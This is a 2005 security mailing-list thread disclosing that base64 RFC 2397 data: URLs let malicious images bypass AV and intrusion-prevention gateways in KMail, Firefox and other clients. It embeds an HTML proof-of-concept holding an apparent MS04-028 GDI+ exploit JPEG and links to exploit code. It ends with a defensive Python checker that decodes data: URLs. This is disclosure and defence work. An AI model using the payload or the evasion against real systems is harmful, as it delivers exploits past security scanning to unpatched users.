Message-ID: <200501121220.41645.noamr@beyondsecurity.com>
From: noamr at beyondsecurity.com (Noam Rathaus)
Subject: Multi-vendor AV gateway image inspection bypass vulnerability - KMail

Hi,

Until recently I thought that embedding images within HTML which will then be 
shown in KMail was impossible. But no longer, it appears that KMail will 
display the images (other things are also possible... I will leave it to your 
imagination) within emails that are viewed with KMail's HTML parser.

On Tue January 11 2005 20:16, Jeff Gillian wrote:
> Interesting. I tested a number of both Linux and Windows image
> vulnerabilities that are all by default detected by my IronPort,
> TippingPoint UnityOne and ISS Proventia appliances.
>
> Using the technique you mentioned, they were ignored completely and
> delivered. Additionally, there appear to be several mail clients that
> support that RFC, including Thunderbird, so you can obviously target more
> than just web browsers.
>
> Jeff.
>
>
> On Mon, 10 Jan 2005 14:08:11 -0500, Darren Bounds
>
> <dbounds@...rusense.com> wrote:
> >
> > Multi-vendor AV gateway image inspection bypass vulnerability
> > January 10, 2005
> >
> > A vulnerability has been discovered which allows a remote attacker to
> > bypass anti-virus (as well as other security technologies such as IDS
> > and IPS) inspection of HTTP image content.
> >
> > By leveraging techniques described in RFC 2397 for base64 encoding
> > image content within the URL scheme, a remote attacker may encode a
> > malicious image within the body of an HTML formatted document to
> > circumvent content inspection.
> >
> > For example:
> >
> > http://www.k-otik.com/exploits/09222004.ms04-28-cmd.c.php
> >
> > The source code at the URL above will by default create a JPEG image
> > that will attempt (and fail without tweaking) to exploit the Microsoft
> > MS04-028 GDI+ vulnerability. The image itself is detected by all AV
> > gateway engines tested (Trend, Sophos and McAfee); however, when the
> > same image is base64 encoded using the technique described in RFC 2397
> > (documented below), inspection is not performed and the image is
> > delivered and rendered by the client.
> >
> > While Microsoft Internet Explorer does not support the RFC 2397 URL
> > scheme, Firefox, Safari, Mozilla and Opera do and will render the data,
> > and thus successfully execute the payload if the necessary OS and/or
> > application patches have not been applied.
> >
> > ## BEGIN HTML ##
> >
> > <html>
> > <body>
> > <img
> > src="data:image/gif;base64,/9j/4AAQSkZJRgABAQEAYABgAAD//
> > gAARXhpZgAASUkqAAgAHPD9f0FBQUGWAgAAGgAAABzw
> > /X9BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
> > QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
> > QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
> > QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
> > QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
> > QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
> > QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
> > QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
> > QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
> > QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
> > QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
> > QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
> > QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
> > QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
> > QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
> > QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
> > QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
> > QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
> > QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQQAAAP/bAEMACAYGBwYFCAcHBwkJ
> > CAoMFA0MCwsMGRITDxQdGh8eHRocHCAkLicgIiwjHBwoNyksMDE0NDQfJzk9ODI8LjM0Mv/b
> > AEMBCQkJDAsMGA0NGDIhHCEyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy
> > MjIyMjIyMjIyMjIyMv/AABEIAAMAAwMBIgACEQEDEQH/xAAfAAABBQEBAQEBAQAAAAAAAAAA
> > AQIDBAUGBwgJCgv/xAC1EAACAQMDAgQDBQUEBAAAAX0BAgMABBEFEiExQQYTUWEHInEUMoGR
> > oQgjQrHBFVLR8CQzYnKCCQoWFxgZGiUmJygpKjQ1Njc4OTpDREVGR0hJSlNUVVZXWFlaY2Rl
> > ZmdoaWpzdHV2d3h5eoOEhYaHiImKkpOUlZaXmJmaoqOkpaanqKmqsrO0tba3uLm6wsPExcbH
> > yMnK0tPU1dbX2Nna4eLj5OXm5+jp6vHy8/T19vf4+fr/xAAfAQADAQEBAQEBAQEBAAAAAAAA
> > AQIDBAUGBwgJCgv/xAC1EQACAQIEBAMEBwUEBAABAncAAQIDEQQFITEGEkFRB2FxEyIygQgU
> > QpGhscEJIzNS8BVictEKFiQ04SXxFxgZGiYnKCkqNTY3ODk6Q0RFRkdISUpTVFVWV1hZWmNk
> > ZWZnaGlqc3R1dnd4eXqCg4SFhoeIiYqSk5SVlpeYmZqio6Slpqeoqaqys7S1tre4ubrCw8TF
> > xsfIycrS09TV1tfY2dri4+Tl5ufo6ery8/T19vf4+fr/2gAMAwEAAhEDEQA/APn+iiigD//
> > Z">
> > </body>
> > </html>
> >
> > ## END HTML ##
> >
> > Solution:
> >
> > While AV vendor patches are not yet available, fixes for all currently
> > known image vulnerabilities are, and have been for several months. If
> > you have not yet applied them, you have your own negligence to blame.
> >
> > Contributions:
> >
> > Thanks to Scott Roeder and Jacinto Rodriquez for their assistance in
> > platform testing.
> >
> > Thank you,
> >
> > Darren Bounds
> > Intrusense, LLC.
> > http://www.intrusense.com
> >
> > --
> > Intrusense - Securing Business As Usual
> >
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.netsys.com/full-disclosure-charter.html

-- 

Noam Rathaus
CTO
Beyond Security Ltd.

http://www.beyondsecurity.com
http://www.securiteam.com
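A gateway-side check for the technique Darren Bounds' advisory describes, added here as an example and not code from the thread or from any of the products named: it pulls every RFC 2397 data: URL out of an HTML body, decodes the base64 the way a rendering client would (whitespace ignored, padding tolerated), and compares the declared media type with the type read from the leading bytes, since the advisory's own sample declares image/gif while its payload begins with the JPEG marker. The function names, the regular expression and the sample HTML are constructed for this example.

```python
import base64
import re
from urllib.parse import unquote_to_bytes

# RFC 2397 form: data:[<mediatype>][;param=value]*[;base64],<data>
# Payload runs to the closing quote; newlines inside it are stripped later.
DATA_URL_RE = re.compile(
    r'data:(?P<mime>[\w.+-]+/[\w.+-]+)?(?:;[\w-]+=[^;,"\']*)*'
    r'(?P<b64>;base64)?,(?P<payload>[^"\'>]*)', re.IGNORECASE)

# Leading-byte signatures for the image formats the thread mentions.
MAGIC = {"image/jpeg": (b"\xff\xd8\xff",),
         "image/gif": (b"GIF87a", b"GIF89a"),
         "image/png": (b"\x89PNG\r\n\x1a\n",)}

def sniff_type(data: bytes) -> str:
    """Classify content by its leading bytes, ignoring the declared label."""
    for mime, sigs in MAGIC.items():
        if any(data.startswith(s) for s in sigs):
            return mime
    return "application/octet-stream"

def decode_payload(payload: str, is_b64: bool) -> bytes:
    """Decode the data part the way a rendering client would."""
    if not is_b64:
        return unquote_to_bytes(payload)       # percent-encoded form
    compact = re.sub(r"\s+", "", payload)      # clients ignore whitespace
    compact += "=" * (-len(compact) % 4)       # tolerate missing padding
    return base64.b64decode(compact)

def inspect_html(html: str) -> list:
    """One record per data: URL; a gateway would hand each record's decoded
    `content` to the same scanner it already runs on plain image files."""
    findings = []
    for m in DATA_URL_RE.finditer(html):
        content = decode_payload(m.group("payload"), bool(m.group("b64")))
        declared = (m.group("mime") or "text/plain").lower()
        actual = sniff_type(content)
        findings.append({"declared": declared, "actual": actual,
                         "size": len(content), "mismatch": declared != actual,
                         "content": content})
    return findings

# Constructed sample: the first <img> is labelled image/gif but carries a
# JPEG header (the advisory's example does the same); the second is a GIF.
_FAKE_JPEG = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01" + b"\x00" * 6
_B64 = base64.b64encode(_FAKE_JPEG).decode()
SAMPLE_HTML = ('<html><body>\n<img src="data:image/gif;base64,' + _B64[:12]
               + "\n" + _B64[12:] + '">\n'
               '<img src="data:image/gif;base64,R0lGODlhAQABAAAAACw=">\n'
               "</body></html>")
```

Running `inspect_html(SAMPLE_HTML)` flags the first image as a label/content mismatch and reports the second as a consistent GIF; either way the decoded bytes are what the scanner must see, not the HTML text.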
